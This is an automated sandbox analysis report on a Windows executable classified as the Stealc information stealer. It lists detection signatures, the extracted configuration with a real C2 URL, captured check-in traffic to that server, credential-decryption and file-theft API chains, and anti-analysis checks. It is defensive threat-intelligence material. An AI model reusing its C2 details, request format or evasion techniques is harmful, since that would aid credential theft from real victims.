Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524645
MD5:9230158d2d15f5f7140b53912347a845
SHA1:01d78cba09eca8d00ad54454ef652b24321bb00d
SHA256:403a726fd6b597b2646fb61f309d5e59f8b33be15b697b6cac53686580e9fce1
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2316 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9230158D2D15F5F7140B53912347A845)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2316JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2316JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.950000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T03:01:01.691850+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.950000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpNVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/pVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpyVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0095C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00959AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00957240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00957240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00959B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00968EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00968EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00964910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00964910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0095DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0095E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0095ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00964570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00964570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0095F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00963EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00963EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0095DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0095BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 30 36 30 41 42 33 46 39 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="hwid"3A060AB3F9603810289448------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build"doma------AKEGDAKEHJDHIDHJJDAE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00956280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00956280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 30 36 30 41 42 33 46 39 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="hwid"3A060AB3F9603810289448------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build"doma------AKEGDAKEHJDHIDHJJDAE--
                Source: file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1721406629.000000000061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
                Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
                Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/p
                Source: file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37=

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B0_2_00D1A06B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D228690_2_00D22869
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD1A600_2_00CD1A60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA720A0_2_00CA720A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA7A040_2_00CA7A04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D243500_2_00D24350
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D20C780_2_00D20C78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1CD680_2_00D1CD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEBD1B0_2_00CEBD1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0FEE20_2_00D0FEE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1862B0_2_00D1862B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C73FE30_2_00C73FE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D277FE0_2_00D277FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C23F460_2_00C23F46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1D72E0_2_00D1D72E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009545C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: rdaizazf ZLIB complexity 0.9948355098785363
                Source: file.exe, 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00968680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00968680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00963720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00963720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3PI5HDF8.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1821184 > 1048576
                Source: file.exeStatic PE information: Raw size of rdaizazf is bigger than: 0x100000 < 0x196800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.950000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rdaizazf:EW;hwyhwwjx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rdaizazf:EW;hwyhwwjx:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00969860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb41e should be: 0x1bd025
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: rdaizazf
                Source: file.exeStatic PE information: section name: hwyhwwjx
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4E8CF push esi; mov dword ptr [esp], edi0_2_00D4E906
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4E8CF push 2B5989ADh; mov dword ptr [esp], ebp0_2_00D4E95C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E130CB push ecx; mov dword ptr [esp], eax0_2_00E130D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E010DA push 2C96C9B1h; mov dword ptr [esp], esi0_2_00E010E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D468B6 push ebx; mov dword ptr [esp], 7CF96FA8h0_2_00D468D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D468B6 push ebp; mov dword ptr [esp], eax0_2_00D468F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D468B6 push edi; mov dword ptr [esp], esi0_2_00D46967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA0A8 push esi; mov dword ptr [esp], eax0_2_00DCA0BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096B035 push ecx; ret 0_2_0096B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC987B push 1105FB53h; mov dword ptr [esp], eax0_2_00DC992E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ebp; mov dword ptr [esp], edx0_2_00D1A09D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ecx; mov dword ptr [esp], ebp0_2_00D1A0AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push edi; mov dword ptr [esp], eax0_2_00D1A10D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ecx; mov dword ptr [esp], 7B4D3346h0_2_00D1A18A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ebp; mov dword ptr [esp], esi0_2_00D1A1FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ebx; mov dword ptr [esp], esi0_2_00D1A21E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push eax; mov dword ptr [esp], 3DBC5BBBh0_2_00D1A299
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push edx; mov dword ptr [esp], 3518FB97h0_2_00D1A316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push eax; mov dword ptr [esp], ecx0_2_00D1A3D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 6837C940h; mov dword ptr [esp], edx0_2_00D1A3E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 6D18B101h; mov dword ptr [esp], ebx0_2_00D1A4FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 2B579155h; mov dword ptr [esp], ecx0_2_00D1A510
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push edx; mov dword ptr [esp], 0202AA06h0_2_00D1A594
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 3F97356Dh; mov dword ptr [esp], ebp0_2_00D1A5DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 43DEC91Bh; mov dword ptr [esp], edx0_2_00D1A62E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push edx; mov dword ptr [esp], ebp0_2_00D1A674
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 179B9906h; mov dword ptr [esp], ebp0_2_00D1A6EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ecx; mov dword ptr [esp], esi0_2_00D1A782
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 65B9DDF7h; mov dword ptr [esp], edi0_2_00D1A836
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push ecx; mov dword ptr [esp], eax0_2_00D1A8ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A06B push 1AB29E91h; mov dword ptr [esp], ebp0_2_00D1A94D
                Source: file.exeStatic PE information: section name: rdaizazf entropy: 7.953372032997779

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00969860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13562
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1F3E second address: BB1F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1F42 second address: BB1811 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2D0B60AF4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007FD2D0B60AECh 0x00000013 jmp 00007FD2D0B60AEFh 0x00000018 push dword ptr [ebp+122D03D5h] 0x0000001e jmp 00007FD2D0B60AF6h 0x00000023 call dword ptr [ebp+122D1BEEh] 0x00000029 pushad 0x0000002a sub dword ptr [ebp+122D320Ch], ecx 0x00000030 xor eax, eax 0x00000032 pushad 0x00000033 mov ax, cx 0x00000036 popad 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b mov dword ptr [ebp+122D2CC4h], esi 0x00000041 mov dword ptr [ebp+122D364Fh], eax 0x00000047 jnc 00007FD2D0B60AFBh 0x0000004d mov esi, 0000003Ch 0x00000052 clc 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 sub dword ptr [ebp+122D2CC4h], ebx 0x0000005d lodsw 0x0000005f jmp 00007FD2D0B60AEDh 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 cld 0x00000069 jmp 00007FD2D0B60AEAh 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 or dword ptr [ebp+122D320Ch], edi 0x00000078 nop 0x00000079 pushad 0x0000007a je 00007FD2D0B60AECh 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C50C second address: D2C510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C510 second address: D2C51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C51A second address: D2C520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
